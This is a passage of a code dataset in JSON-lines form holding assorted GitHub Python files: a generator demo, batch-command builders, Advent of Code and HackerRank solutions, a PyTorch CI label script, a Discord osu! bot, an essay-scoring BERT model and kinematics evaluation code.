\"properties\": {\n \"relative_base_uri_change\": {\n \"$comment\": \"This should resolve to some_relative_id/other.json\",\n \"id\": \"other.json\",\n }\n },\n }\n }\n }\n absolute_ids = absolute_id_map(schema)\n assert len(absolute_ids) == 0\n","repo_name":"vriesdemichael/microservices","sub_path":"tests/test_schema_parsing.py","file_name":"test_schema_parsing.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21974824323","text":"#def gp(a,q):\r\n\t#k = 0\r\n\t#while True:\r\n\t\t#result = a * q**k\r\n\t\t#if result <=10000:\r\n\t\t\t#yield result\r\n\t\t#else:\r\n\t\t\t#return\r\n\t\t#print(k)\r\n\t\t#k += 1\r\n\t\t\r\n\t\t\r\n#a, q = input().strip().split(' ')\r\n#[a, q] = map(int, [a,q])\r\n#gps = gp(a,q)\r\n##print(list(gp(a,q))\t\t)\r\n##print(gp(a,q))\r\n#print(gps.__next__())\r\n#print(gps.__next__())\r\n#print(gps.__next__())\r\n\r\n\r\ndef counter(start=0):\r\n\tn = start\r\n\twhile True:\r\n\t\tresult = yield n # A\r\n\t\tprint(type(result), result) # B\r\n\t\tif result == 'Q':\r\n\t\t\tbreak\r\n\t\tn += 1\r\nc = counter()\r\nprint(next(c)) # C\r\nprint(c.send('Wow!')) # D\r\nprint(next(c)) # E\r\nprint(c.send('Q')) # F\r\n","repo_name":"pyaf/hackerrank","sub_path":"algorithm/challenges/newtest.py","file_name":"newtest.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9060941418","text":"\r\n\r\ndef main():\r\n\r\n output = open('RUN_LCD-Composer_Human_SRsearch_and_SKsearch_Batch.bat', 'w')\r\n \r\n for s_comp in range(20, 105, 5):\r\n for r_comp in range(20, 105, 5):\r\n if s_comp + r_comp > 100:\r\n continue\r\n \r\n # WRITE COMMANDS FOR S+R SEARCH\r\n output.write('python LCD-Composer.py UP000005640_9606.fasta Human_S-R_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS -a S_R -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n output.write('python LCD-Composer.py UP000005640_9606_additional.fasta Human_S-R_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS_Additional_Isoforms -a S_R -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n \r\n # WRITE COMMANDS FOR S+K SEARCH, USING r_comp VALUE BUT SUBSTITUTING K IN PLACE OF R IN THE SEARCH\r\n output.write('python LCD-Composer.py UP000005640_9606.fasta Human_S-K_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS -a S_K -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n \r\n output.close()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"RossLabCSU/RNA2022","sub_path":"Reproducibility/Human_RSdomains/make_Human_SRsearch_and_SKsearch_BatchFile.py","file_name":"make_Human_SRsearch_and_SKsearch_BatchFile.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"759488346","text":"from base import BaseDay\n\n\nclass Day(BaseDay):\n day = 5\n\n def load_initial(self):\n lines = self.data_lines[:8]\n lines.reverse()\n STACK_COUNT = 9\n stacks = [list() for _ in range(STACK_COUNT)]\n\n for line in lines:\n for n in range(STACK_COUNT):\n letter = line[(n * 4) + 1]\n if letter != ' ':\n stacks[n].append(letter)\n\n self.stacks = stacks\n\n def part_1(self):\n self.load_initial()\n \n instructions = self.data_lines[10:]\n for line in instructions:\n if line == '':\n continue\n\n _, a, _, b, _, c = line.split(' ')\n n, start, end = int(a), int(b), int(c)\n\n for _ in range(n):\n self.stacks[end - 1].append(self.stacks[start - 1].pop())\n\n ends = [stk.pop() for stk in self.stacks]\n print(''.join(ends))\n\n def part_2(self):\n self.load_initial()\n \n instructions = self.data_lines[10:]\n for line in instructions:\n if line == '':\n continue\n\n _, a, _, b, _, c = line.split(' ')\n n, start, end = int(a), int(b), int(c)\n\n to_remove = self.stacks[start - 1][-n:]\n del self.stacks[start - 1][-n:]\n\n self.stacks[end-1].extend(to_remove)\n\n ends = [stk.pop() for stk in self.stacks]\n print(''.join(ends))\n\nDay().execute()\n","repo_name":"gavinhodge/adventofcode-2022","sub_path":"day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14801748519","text":"#!/usr/bin/env python3\nimport sys\nfrom pathlib import Path\nfrom typing import Any, cast, Dict, List, Set\n\nimport yaml\n\nGITHUB_DIR = Path(__file__).parent.parent\n\n\ndef get_workflows_push_tags() -> Set[str]:\n \"Extract all known push tags from workflows\"\n rc: Set[str] = set()\n for fname in (GITHUB_DIR / \"workflows\").glob(\"*.yml\"):\n with fname.open(\"r\") as f:\n wf_yml = yaml.safe_load(f)\n # \"on\" is alias to True in yaml\n on_tag = wf_yml.get(True, None)\n push_tag = on_tag.get(\"push\", None) if isinstance(on_tag, dict) else None\n tags_tag = push_tag.get(\"tags\", None) if isinstance(push_tag, dict) else None\n if isinstance(tags_tag, list):\n rc.update(tags_tag)\n return rc\n\n\ndef filter_ciflow_tags(tags: Set[str]) -> List[str]:\n \"Return sorted list of ciflow tags\"\n return sorted(\n tag[:-2] for tag in tags if tag.startswith(\"ciflow/\") and tag.endswith(\"/*\")\n )\n\n\ndef read_probot_config() -> Dict[str, Any]:\n with (GITHUB_DIR / \"pytorch-probot.yml\").open(\"r\") as f:\n return cast(Dict[str, Any], yaml.safe_load(f))\n\n\ndef update_probot_config(labels: Set[str]) -> None:\n orig = read_probot_config()\n orig[\"ciflow_push_tags\"] = filter_ciflow_tags(labels)\n with (GITHUB_DIR / \"pytorch-probot.yml\").open(\"w\") as f:\n yaml.dump(orig, f, indent=4, sort_keys=False)\n\n\nif __name__ == \"__main__\":\n from argparse import ArgumentParser\n\n parser = ArgumentParser(\"Validate or update list of tags\")\n parser.add_argument(\"--validate-tags\", action=\"store_true\")\n args = parser.parse_args()\n pushtags = get_workflows_push_tags()\n if args.validate_tags:\n config = read_probot_config()\n ciflow_tags = set(filter_ciflow_tags(pushtags))\n config_tags = set(config[\"ciflow_push_tags\"])\n if config_tags != ciflow_tags:\n print(\"Tags mismatch!\")\n if ciflow_tags.difference(config_tags):\n print(\n \"Reference in workflows but not in config\",\n ciflow_tags.difference(config_tags),\n )\n if config_tags.difference(ciflow_tags):\n print(\n \"Reference in config, but not in workflows\",\n config_tags.difference(ciflow_tags),\n )\n print(f\"Please run {__file__} to remediate the difference\")\n sys.exit(-1)\n print(\"All tags are listed in pytorch-probot.yml\")\n else:\n update_probot_config(pushtags)\n","repo_name":"pytorch/pytorch","sub_path":".github/scripts/collect_ciflow_labels.py","file_name":"collect_ciflow_labels.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"45107210420","text":"# encoding: utf-8\n\nimport requests\nimport json\nimport random\n\nurl_update = \"http://192.168.138.191:9080/ime-container/imePlanOrder/insertPlanOrder.action\"\n\nheaders = {'Content-Type': 'application/json'}\n\n\ndef testCreate():\n data = {\n \"code\": 'API' + str(random.randint(10000, 99999)), # 编码--非空\n \"workCenterGid\": \"0aad8f6efdbb404c94296965918d1a9d\", # 工作中心--非空\n \"orderType\": \"ss\", # 订单类型\n \"materialGid\": \"2e178a4731304d8f9b959e685fed0228\", # 物料Gid--非空\n \"materialVersion\": \"1\", # 物料版本(冗余)--非空\n \"planBeginTime\": \"2018-01-04\", # 计划开始时间--非空\n \"planEndTime\": \"2018-01-14\", # 计划完成时间--非空\n \"planQty\": \"50\", # 生产订单数量--非空\n \"finishQty\": \"\", # 已完工数量\n \"publishedQty\": \"\", # 已下发数量\n \"qualifiedQty\": \"\", # 合格数量\n \"unqualifiedQty\": \"\", # 不合格数量\n \"wasteQty\": \"\", # 废品数量\n \"orderStatus\": \"\", # 订单状态\n \"planOrderSource\": \"\", # 生产订单来源\n \"planOrderCategory\": \"normal\", # 订单类别\n \"orderSeq\": \"\", # 订单顺序\n \"factoryLineGid\": \"\", # 产线\n \"actualBeginTime\": \"\", # 实际开始时间\n \"actualEndTime\": \"\", # 实际结束时间\n \"measureBeginTime\": \"\", # 测算开始时间\n \"measureEndTime\": \"\", # 测算结束时间\n \"bomStatus\": \"\", # BOM状态\n \"processStatus\": \"\", # 订单进程\n \"canOperation\": \"\", # 是否可操作\n \"surplusOrderFlag\": \"\" # 是否余量订单\n }\n\n resp = requests.post(url=url_update,headers=headers,data=json.dumps(data)).text\n\n print(resp)\n\n\n\ncount = 0\n\n# while(count<3):\n# testCreate()\n# count =count+1\n\n\nfor i in range(2):\n testCreate()","repo_name":"liuzhengxing/Test","sub_path":"Python/APIProject/Basic/Order_Create.py","file_name":"Order_Create.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33448683168","text":"import csv\nimport json\n\n\ncause_dict = dict()\nstat_dict = dict()\nroad_dict = dict()\nalchol_dict = {\n 2: 0,\n 3: 0.075,\n 4: 0.125,\n 5: 0.20,\n 6: 0.275\n}\nreason_dict = {\n 1: \"違規超車\"\n ,2: \"爭(搶)道行駛\"\n ,3: \"蛇行、方向不定\"\n ,4: \"逆向行駛\"\n ,5: \"未靠右行駛\"\n ,6: \"未依規定讓車\"\n ,7: \"變換車道或方向不當\"\n ,8: \"左轉彎未依規定\"\n ,9: \"右轉彎未依規定\"\n ,10: \"迴轉未依規定\"\n ,11: \"橫越道路不慎\"\n ,12: \"倒車未依規定\"\n ,13: \"超速失控\"\n ,14: \"未依規定減速\"\n ,15: \"搶越行人穿越道\"\n ,16: \"未保持行車安全距離\"\n ,17: \"未保持行車安全間隔\"\n ,18: \"停車操作時,未注意其他車(人)安全\"\n ,19: \"起步未注意其他車(人)安全\"\n ,20: \"吸食違禁物後駕駛失控\"\n ,21: \"酒醉(後)駕駛失控\"\n ,22: \"疲勞(患病)駕駛失控\"\n ,23: \"未注意車前狀態\"\n ,24: \"搶(闖)越平交道\"\n ,25: \"違反號誌管制或指揮\"\n ,26: \"違反特定標誌(線)禁制\"\n ,27: \"未依規定使用燈光\"\n ,28: \"暗處停車無燈光、標識\"\n ,29: \"夜間行駛無燈光設備\"\n ,30: \"裝載貨物不穩妥\"\n ,31: \"載貨超重而失控\"\n ,32: \"超載人員而失控\"\n ,33: \"貨物超長、寬、高而肇事\"\n ,34: \"裝卸貨物不當\"\n ,35: \"裝載未盡安全措施\"\n ,36: \"未待乘客安全上下開車\"\n ,37: \"其他裝載不當肇事\"\n ,38: \"違規停車或暫停不當而肇事\"\n ,39: \"拋錨未採安全措施\"\n ,40: \"開啟車門不當而肇事\"\n ,41: \"使用手持行動電話失控\"\n ,42: \"其他引起事故之違規或不當行為\"\n ,43: \"不明原因肇事\"\n ,44: \"尚未發現肇事因素\"\n ,45: \"煞車失靈\"\n ,46: \"方向操縱系統故障\"\n ,47: \"燈光系統故障\"\n ,48: \"車輪脫落或輪胎爆裂\"\n ,49: \"車輛零件脫落\"\n ,50: \"其他引起事故之故障\"\n ,51: \"未依規定行走行人穿越道、地下道、天橋而穿越道路\"\n ,52: \"未依標誌、標線、號誌或手勢指揮穿越道路\"\n ,53: \"穿越道路未注意左右來車\"\n ,54: \"在道路上嬉戲或奔走不定\"\n ,55: \"未待車輛停妥而上下車\"\n ,56: \"上下車輛未注意安全\"\n ,57: \"頭手伸出車外而肇事\"\n ,58: \"乘坐不當而跌落\"\n ,59: \"在路上工作未設適當標識\"\n ,60: \"其他引起事故之疏失或行為\"\n ,61: \"路況危險無安全(警告)設施\"\n ,62: \"交通管制設施失靈或損毀\"\n ,63: \"交通指揮不當\"\n ,64: \"平交道看守疏失或未放柵欄\"\n ,65: \"其他交通管制不當\"\n ,66: \"動物竄出\"\n ,67: \"尚未發現肇事因\"\n}\nwith open(\"traffic_accident_105.csv\", \"r\", encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n total_death = 0\n total_alchol = 0\n total_speed_limit = 0\n for row in reader:\n area = row[\"區\"]\n try:\n cause = reason_dict[int(row[\"主要肇因\"])]\n drink = int(row[\"飲酒情形\"])\n if area not in cause_dict:\n # print(area)\n cause_dict[area] = {}\n stat_dict[area] = {}\n road_dict[area] = {}\n if cause not in cause_dict[area]:\n cause_dict[area][cause] = {\"total_death\": 0, \"total_alchol\": 0,\n \"total_limit\": 0, \"cnt\": 0}\n stat_dict[area][cause] = {\"avg_death\": 0, \"avg_alchol\": 0,\n \"avg_limit\": 0}\n road_dict[area][cause] = 0\n if 2 <= drink <= 6:\n cause_dict[area][cause][\"total_death\"] += int(row[\"死\"]) + int(row[\"受傷\"])\n cause_dict[area][cause][\"total_alchol\"] += alchol_dict[drink]\n cause_dict[area][cause][\"total_limit\"] += int(row[\"速限\"])\n cause_dict[area][cause][\"cnt\"] += 1\n road_dict[area][cause] += 1\n except ValueError:\n continue\n \nfor area, cause in cause_dict.items():\n for reason in cause.keys():\n reason_len = cause_dict[area][reason][\"cnt\"]\n if reason_len == 0:\n continue\n stat_dict[area][reason][\"avg_death\"] = cause_dict[area][reason][\"total_death\"] / reason_len\n stat_dict[area][reason][\"avg_alchol\"] = cause_dict[area][reason][\"total_alchol\"] / reason_len\n stat_dict[area][reason][\"avg_limit\"] = cause_dict[area][reason][\"total_limit\"] / reason_len\n\n\nwith open(\"../stat.json\", \"w\", encoding=\"utf8\") as f:\n json.dump(stat_dict, f, ensure_ascii=False)\n\nwith open(\"../reason.json\", \"w\", encoding=\"utf8\") as f:\n json.dump(road_dict, f, ensure_ascii=False)\n","repo_name":"tcaopendata/hackathon","sub_path":"backend/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17077171096","text":"import discord\nfrom discord.ext import commands\nimport json\nfrom tokengen import osuapi\nfrom user import get_user\nimport datetime\nimport time\n\nclass osu(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.slash_command(\n name=\"osuregister\",\n description=\"register your osu ID to the bot\"\n )\n async def osuregister(self, ctx, playerid:int):\n params = {\n 'key': 'id'\n }\n link = f\"users/{playerid}\"\n data = osuapi(params, link)\n \n if data.status_code != 200:\n await ctx.respond(\"player id is invalid.\")\n return\n\n with open(\"users.json\") as file:\n listObj = json.load(file)\n\n listObj[str(ctx.user.id)] = playerid\n\n with open(\"users.json\", 'w') as json_file:\n json.dump(listObj, json_file, indent=2)\n\n await ctx.respond(f\"your profile is set to {data.json()['username']}\")\n \n @commands.slash_command(\n name=\"topplay\",\n description=\"Get the pp value of your top play in osu\"\n )\n async def topplay(self, ctx):\n playerid = await get_user(ctx)\n params = {\n 'mode': 'osu',\n 'limit': 1\n }\n link = f\"users/{playerid}/scores/best\"\n data = osuapi(params, link).json()\n print(json.dumps(data, indent=2))\n embed = discord.Embed(\n description = f'{data[0][\"weight\"][\"pp\"]}pp\\nplay set at \\n[Map Link]({data[0][\"beatmap\"][\"url\"]})',\n )\n embed.set_author(name = f\"{data[0]['beatmapset']['title']} [{data[0]['beatmap']['version']}]\",\n url = data[0]['beatmap']['url'])\n await ctx.respond(embed=embed)\n\n @commands.slash_command(\n name=\"recent\",\n description=\"Get the pp value of your most recent play in osu\"\n )\n async def recent(self, ctx):\n playerid = await get_user(ctx)\n params = {\n 'mode': 'osu',\n 'limit': 1\n }\n link = f\"users/{playerid}/scores/recent\"\n data = osuapi(params, link).json()\n print(json.dumps(data, indent=2))\n embed = discord.Embed(\n description = f'{data[0][\"pp\"]}pp\\nplay set at ',\n )\n embed.set_author(name = f\"{data[0]['beatmapset']['title']} [{data[0]['beatmap']['version']}]\",\n url = data[0]['beatmap']['url'])\n await ctx.respond(embed=embed)\n\ndef setup(client):\n client.add_cog(osu(client))","repo_name":"DBosPriv/Discord-bot1.0","sub_path":"cogs/customs/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16645501421","text":"def zipped():\n n, x = map(int, input().strip().split())\n exam = []\n exam += [map(float, input().strip().split()) for _ in range(x)]\n average_student = [sum(stud) / x for stud in zip(*exam)]\n print(\"\\n\".join(map(str, average_student)))\n\n\ndef func_input():\n x, k = map(int, input().strip().split())\n print(eval(input().replace(\"x\", str(x))) == k)\n\n\ndef evaluation():\n eval(input())\n\n\ndef athlete_sort():\n n, m = map(int, input().strip().split())\n arr = [list(map(int, input().strip().split())) for _ in range(n)]\n k = int(input().strip())\n # NEED TO DONE IT\n [print(\" \".join(map(str, row))) for row in sorted(arr, key=lambda r: r[k])]\n\n\ndef any_or_all():\n n, arr = int(input().strip()), list(map(int, input().strip().split()))\n print(\n any([str(el) == str(el)[::-1] for el in arr])\n if all([el >= 0 for el in arr])\n else False\n )\n\n\ndef ginortS():\n print(\n *(\n sorted(\n input(),\n key=lambda x: (\n x.isdigit(),\n x.isdigit() and int(x) % 2 == 0,\n x.isupper(),\n x.islower(),\n x,\n ),\n )\n ),\n sep=\"\"\n )\n\n\nginortS()\n","repo_name":"SakhnoAndrey/hackerrank_python","sub_path":"built_ins.py","file_name":"built_ins.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1825909441","text":"# coding=utf-8\nimport nltk\nimport torch.nn as nn\nfrom transformers import BertModel, BertTokenizer\n\nMODELS = [(BertModel, BertTokenizer, 'bert-base-uncased')]\n\n\nclass BCNN(nn.Module):\n def __init__(self, args):\n super().__init__()\n\n self.max_sentence_length = args.max_sentence_length\n if self.max_sentence_length > 510:\n self.max_sentence_length = 510\n\n self.pretrained_weights = args.model_name\n\n self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_weights)\n self.cls_token_id = self.tokenizer.convert_tokens_to_ids([self.tokenizer.cls_token])[0]\n self.sep_token_id = self.tokenizer.convert_tokens_to_ids([self.tokenizer.sep_token])[0]\n\n self.bert = BertModel.from_pretrained(self.pretrained_weights).to(args.device)\n\n # self.classifier = CNN(args)\n self.gru = nn.GRU(input_size=args.bert_hidden_size, hidden_size=args.bert_hidden_size, bidirectional=True,\n batch_first=True, dropout=args.gru_dropout)\n\n self.dropout = nn.Dropout(args.linear_dropout)\n\n self.classifier = nn.Linear(in_features=args.bert_hidden_size * 2, out_features=args.label_num)\n self.max_score = args.max_score\n self.min_score = args.min_score\n\n self.init_weights()\n\n def forward(self, essay):\n # data对应一个文章集合,多次调用bert,获取到整个文章的表示,然后输入分类器\n\n batch_tokens, longest_sentence_length = self.encode(essay)\n for _tokens in batch_tokens:\n pad_seq_length = min(longest_sentence_length, self.max_sentence_length)\n tokens = [self.cls_token_id] + _tokens[:pad_seq_length] + [self.sep_token_id]\n\n sentence_length = len(tokens)\n pad_seq_length += 2\n\n token_type_ids = [0] * sentence_length\n input_mask = [1] * sentence_length\n\n padding = [0] * (pad_seq_length - sentence_length)\n tokens += padding\n token_type_ids += padding\n input_mask += padding\n\n def encode(self, data):\n # 编码句子表示, 暂时一个句子一个句子的处理\n sentence_list = [[self.process_text(d)] for d in data]\n\n batch_tokens = []\n longest_sentence_length = 0\n for sentence in sentence_list:\n tokenized_text = self.tokenizer.encoder(sentence)\n batch_tokens.append(tokenized_text)\n longest_sentence_length = max(longest_sentence_length, len(tokenized_text))\n\n return batch_tokens, longest_sentence_length\n\n def process_text(self, essay):\n \"\"\" 按照句子分割 \"\"\"\n sentences = nltk.sent_tokenize(essay)\n return sentences\n","repo_name":"wangqi1996/AES-bert","sub_path":"src/model/bcnn.py","file_name":"bcnn.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72171110313","text":"#! /usr/bin/env python\n\nimport random\nimport playermodel,stat_utils\n\n#random.seed(1234)\n\n#players = ['Andy', 'Bob', 'Carl', 'Donna', 'Erin', 'Fran']\nactivePlayerNames = ['Andy', 'Bob', 'Carl', 'Donna', 'Erin', 'Fran']\nhiddenScores = { 'Andy':1.0, 'Bob':2.0, 'Carl':3.0, 'Donna': 4.0, 'Erin': 5.0, 'Fran':6.0}\n\ndef genRandomBouts(playersByName, activePlayerNames, nTrials):\n result = []\n for _ in range(nTrials):\n pair = random.sample(activePlayerNames,2) \n result.append( playermodel.Bout(playersByName[pair[0]], playersByName[pair[1]])) \n return result\n\n\nplayersByName = {}\nfor name,score in list(hiddenScores.items()):\n playersByName[name] = playermodel.LogitPlayer(name,score)\nbouts = genRandomBouts(playersByName, activePlayerNames,100)\nfor i,b in enumerate(bouts): print(\"%d: %s\"%(i,b))\nfor b in bouts: b.resolve()\nfor i,b in enumerate(bouts): \n print(\"%d: %s\"%(i,b))\n print(b.getWinner())\n print(b.getLoser())\nestDict = stat_utils.estimate(playersByName, activePlayerNames, bouts)\n#counts = {}\n#trials = genRandomOutcomes(playersByName, activePlayerNames,10000)\n##print trials\n#estDict = lordbayes.estimate(players,trials)\n#print estDict\n","repo_name":"jswelling/BayesTourney","sub_path":"src/tests/obsolete/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6183701275","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@file: find_path.py\n@author: wiley\n@datetime: 2020/6/4 10:40 AM\n\n二叉树中和为某一值得路径\n输入一棵二叉树和一个整数,打印出二叉树中节点值的和为输入整数的所有路径。\n从根节点开始往下一值到叶节点所经过的节点形成一条路径\n\"\"\"\n\n\nclass TreeNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef path_sum(root, expected_sum):\n \"\"\"\n @param root: TreeNode\n @param expected_sum: int\n @return: List[List[int]]\n \"\"\"\n result, path = [], []\n\n def recur(node, tar):\n if not node:\n return\n path.append(node.val)\n tar = tar - node.val\n if tar == 0 and not node.left and not node.right:\n result.append(path[:])\n recur(node.left, tar)\n recur(node.right, tar)\n path.pop()\n\n recur(root, expected_sum)\n return result\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"skybrim/practice_leetcode_python","sub_path":"offer/data_structure/tree/find_path.py","file_name":"find_path.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21789994518","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\nVERSION = '0.0.2'\nDESCRIPTION = ('Simply python utility wrapping around apktool to extract apk'\n 'information')\nLONG_DESCRIPTION = Path('readme.md').read_text()\n\n# Setting up\nsetup(\n # the name must match the folder name 'verysimplemodule'\n name=\"apkparse\",\n version=VERSION,\n author=\"Haider Ali\",\n author_email=\"neo@xkern.net\",\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n packages=find_packages(),\n install_requires=[\n 'pyyaml',\n 'xmltodict'\n ],\n\n keywords=['django', 'djangorestframework', 'responses', 'xkern'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3 :: Only\"\n ])\n","repo_name":"xKern/apkparse","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10169950502","text":"\"\"\"Private code for CUDA rules.\"\"\"\n\nload(\"//cuda:defs.bzl\", \"CudaTargetsInfo\", \"cuda_targets\")\nload(\"//cuda:toolchain.bzl\", \"CudaToolchainInfo\")\nload(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"find_cpp_toolchain\")\nload(\"@bazel_skylib//rules:common_settings.bzl\", \"BuildSettingInfo\")\nload(\"@local_cuda//:defs.bzl\", \"if_local_cuda\")\n\ndef _cuda_targets_flag_impl(ctx):\n for cuda_target in ctx.build_setting_value:\n if cuda_target not in cuda_targets:\n fail(\"%s is not a supported %s value.\" % (cuda_target, ctx.label))\n return CudaTargetsInfo(cuda_targets = ctx.build_setting_value)\n\ncuda_targets_flag = rule(\n implementation = _cuda_targets_flag_impl,\n build_setting = config.string_list(flag = True),\n provides = [CudaTargetsInfo],\n)\n\ndef _detect_cuda_toolchain_impl(ctx):\n cc_toolchain = find_cpp_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = [\"cuda\"],\n )\n is_enabled = cc_common.is_enabled(\n feature_configuration = feature_configuration,\n feature_name = \"cuda\",\n )\n return [config_common.FeatureFlagInfo(value = str(is_enabled))]\n\n# Rule providing whether the current cc_toolchain supports feature 'cuda'.\ndetect_cuda_toolchain = rule(\n implementation = _detect_cuda_toolchain_impl,\n attrs = {\n \"_cc_toolchain\": attr.label(\n default = Label(\"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n ),\n },\n toolchains = [\"@bazel_tools//tools/cpp:toolchain_type\"],\n fragments = [\"cpp\"],\n)\n\ndef _report_error_impl(ctx):\n ctx.actions.run_shell(\n outputs = [ctx.outputs.out],\n progress_message = \"\\n%s\\n\" % ctx.attr.message,\n command = \"false \\\"%s\\\"\" % ctx.attr.message,\n )\n\n# Rule which passes anlysis phase, but fails during execution with message.\nreport_error = rule(\n implementation = _report_error_impl,\n attrs = {\n \"message\": attr.string(),\n \"out\": attr.output(mandatory = True),\n },\n)\n\ndef _cuda_toolchain_info_impl(ctx):\n return [\n DefaultInfo(files = depset([ctx.file._nvcc] if ctx.file._nvcc else [])),\n CudaToolchainInfo(\n nvcc = ctx.file._nvcc,\n compiler = ctx.attr._compiler[BuildSettingInfo].value,\n cuda_targets = ctx.attr._cuda_targets[CudaTargetsInfo].cuda_targets,\n copts = ctx.attr._copts[BuildSettingInfo].value,\n ),\n ]\n\n# A rule that encapsulates the information to pass to cuda_toolchain_config.\n# Specifically, it combines //cuda:cuda_targets, @local_cuda//:cuda/bin/nvcc\n# and //cuda:compiler.\ncuda_toolchain_info = rule(\n implementation = _cuda_toolchain_info_impl,\n attrs = {\n \"_cuda_targets\": attr.label(\n default = Label(\"//cuda:cuda_targets\"),\n ),\n \"_nvcc\": attr.label(\n default = if_local_cuda(Label(\"@local_cuda//:cuda/bin/nvcc\"), None),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n ),\n \"_compiler\": attr.label(default = Label(\"//cuda:compiler\")),\n \"_copts\": attr.label(default = Label(\"//cuda:copts\")),\n },\n provides = [CudaToolchainInfo],\n)\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"runtime-master/third_party/rules_cuda/private/build.bzl","file_name":"build.bzl","file_ext":"bzl","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"70219261674","text":"import numpy as np\nfrom planar_kinematic_functions import *\n\n#evaluates the solutions of the numerical solver TRAC-IK\n\nif __name__ == \"__main__\":\n\n joints_num_val = np.load(\"./data/joints_num_val.npy\") #solutions by TRAC-IK from ubuntu machine\n link_lengths = np.load(\"./data/link_lengths.npy\")\n delta_theta = np.load(\"./data/delta_theta.npy\")\n Y_val = np.load(\"./data/Y_val.npy\")\n joint_limits = np.load(\"./data/joint_limits.npy\")\n X_val = np.load(\"./data/X_val.npy\")\n \n #calculate success rate\n n_fails = np.sum(np.isnan(joints_num_val[:,0]))\n success_rate = 1 - (n_fails / joints_num_val.shape[0])\n \n #filter NaN values out before calculating the errors\n notnan = np.invert(np.isnan(joints_num_val[:,0]))\n joints_num_notnan = joints_num_val[notnan]\n X_val_notnan = X_val[notnan]\n\n cartesian_num_notnan = FK_2D(joints_num_notnan, link_lengths)\n pos_error = mae_position(X_val_notnan[:,:2], cartesian_num_notnan[:,:2])\n orient_error = mae_orientation_2D(X_val_notnan[:,2], cartesian_num_notnan[:,2])\n mean_min_errors, median_min_errors = min_error_2D_3DOF(Y_val, delta_theta, link_lengths)\n viol_rate = joint_limit_violation_rate(joints_num_notnan, joint_limits)\n print(\"\\nTRAC-IK success rate: \"+str(success_rate)+\n \"\\nTRAC-IK mean absolute position error of successes: \"+str(pos_error)+\n \"\\nTRAC-IK mean absolute orientation error of successes: \"+str(orient_error)+\n \"\\nJoint limit violation rate: \"+str(viol_rate))","repo_name":"tvoeh/distal-teaching-ik","sub_path":"2D/numeric_eval.py","file_name":"numeric_eval.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"5118544755","text":"#问题引入,要求把输入的所有信息记录下来,供后面其它地方使用\r\nimport os\r\nimport time\r\n\r\nwhile True:\r\n strInput = input(\"请输入内容:\")\r\n print(strInput)\r\n if strInput.upper() == \"Q\":\r\n print(\"输入结束\")\r\n break;\r\n\r\n#怎么把输入的内容找出来呢???\r\nprint(\"????\")\r\n# print(listStore)\r\ntime.sleep(100)\r\n","repo_name":"zengx-git/teachingpython","sub_path":"20201008list.py","file_name":"20201008list.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41387502718","text":"\n\nimport argparse\nimport 